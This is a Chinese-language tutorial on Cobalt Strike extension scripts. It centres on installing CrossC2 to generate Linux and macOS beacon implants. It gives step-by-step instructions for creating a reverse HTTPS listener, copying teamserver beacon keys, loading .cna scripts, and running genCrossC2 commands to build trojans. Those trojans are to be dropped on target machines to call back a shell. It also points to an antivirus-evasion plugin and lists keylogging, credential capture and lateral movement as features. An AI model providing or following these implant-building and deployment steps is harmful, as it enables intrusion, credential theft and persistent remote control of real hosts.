CobaltStrike扩展脚本
扩展脚本简介
扩展是 Cobaltstrike 一个极为重要的模块,它有效地丰富了 Cobaltstrike 的功能。
选择菜单栏的 CobaltStrike > Script Manager(脚本管理器) ,点击 Load(加 载) ,然后选择要使用的 .cna 扩展文件即可。
扩展脚本插件
后渗透插件:梼杌 https://github.com/XZVB12/taowu-cobalt-strike-en
免杀插件:bypassAV https://github.com/cseroad/bypassAV
上线linux主机:CrossC2 https://github.com/gloxec/CrossC2
CS上线Linux主机
CrossC2介绍
Cross C2 项目是一个可以生成 Linux/Mac OS 的 Cobaltstrike beacon payload 的跨平台项目。
1.Linux & MacOS 支持无文件落地从内存中加载执行 动态库 或 可执行文件。
2.灵活自定义执行文件的数据返回类型,端口扫描,屏幕截图,键盘记录,口令凭证 等用户自定义开发实现更便捷。
3.自定义通信协议
4.支持横向移动
5.支持从内存加载脚本
6.Android & iPhone 支持
支持 CobaltStrike 对其他平台(Linux/MacOS/…)的安全评估,及包含Unix后渗透模 块开发支持
CrossC2安装
https://github.com/gloxec/CrossC2/releases/
先下载工具脚本
下载 CrossC2.cna、genCrossC2、CrossC2Kit
修改CrossC2.cna配置
修改 $CC2_PATH 路径为下载的 genCrossC2 真实路径 (因为在windows上搞,所以用的windows的exe)
修改 $CC2_BIN 为使用的 genCrossC2 程序名字
创建Listener与拷贝Key
第一步:创建Listener监听器 windows/beacon_https/reverse_https
第二步:拷贝teamserver目录的 .cobaltstrike.beacon_keys 文件到本地客户端目录
一定要先执行第一步,不然上线不了
先进行监听器的创建。
把那个key的文件下载到自己本机的windows上的cs4.7的目录下
添加CNA扩展脚本
去刚刚下载的cc2的那个文件夹里面找到cna的文件,添加 CrossC2.cna进去脚本管理器中 (如果成功安装,菜单栏会多出一项 CrossC2 )
功能扩展
打开下载的 CrossC2Kit 文件夹,添加 CrossC2Kit_Loader.cna , 包含内存加 载等其它功能
cs4.x 版本文件管理、进程列表功能缺失,必须使用此Loader来重启
CrossC2 上线测试
GUI生成木马
默认使用 cli 或 cna 提供的GUI功能生成 beacon
反向的:CrossC2 > Create CrossC2 Listener > Create reverse HTTPS Listener
正向的: CrossC2 > Create CrossC2 Listener > Create bind TCP Listener
在日志文件中可以看见具体的操作命令,第一部分是win.exe的程序路径,第二个是vps的ip和监听的端口,第三个是keys的路径 ,后面是linux的平台和架构,最后是木马的文件名字。
生成的木马文件在自己客户端的cs4.7的文件夹下面。
执行木马
生成的out文件丢去linux上去添加执行权限,然后开始执行,成功上线。默认是交互是ssh的一个交互,但是操作的命令和windows的不同,所以可以通过help来查看可以执行的命令。
Cli 生成木马
windows的命令行那种去生成木马
反向:
./genCrossC2.Win.exe Listener-IP Listener-Port .cobaltstrike.beacon_keys null Linux x64 cc2-test
正向:(要在linux中执行,好像只有4.1-4.4才能这样搞)
./genCrossC2.Linux 127.0.0.1 4444 .cobaltstrike.beacon_keys null Linux-bind x64 cc
可以在win.exe的目录找到木马,然后丢上去目标机器执行,会反弹回来shell。
操作过程中要注意如下几点:
- 需要改 cna 脚本中 genCrossC2 路径。
- 要使用 windows/beacon_https/reverse_https 监听器。
- 要把团队服务器下的隐藏文件 .cobaltstrike.beacon_keys 复制到本地 CS 目录下。
- 文件都丢到 CS 客户端根目录下,别搞二级目录。
- 生成的 payload 是一个 Linux 下的可执行 payload 和可执行文件, IP 和端 口对应 windows/beacon_https/reverse_https 监听器。